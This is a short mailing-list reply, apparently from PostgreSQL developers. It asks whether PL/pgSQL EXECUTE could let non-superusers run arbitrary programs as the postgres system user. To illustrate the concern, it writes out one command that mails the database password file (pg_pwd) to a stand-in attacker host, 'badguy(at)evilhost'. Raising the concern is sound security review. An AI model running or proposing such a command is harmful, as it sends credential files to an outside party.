> Huh? This would only be true if all operations inside plpgsql are
> executed as superuser, which they are not. Seems to me the existing
> defense against non-superuser using COPY is sufficient.
Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
allow execution of any program via exec*() call? If so, this will allow any
(system) user to execute arbitrary code as postgres (system) user, right?
If so, how can something like
EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';
be avioded?
--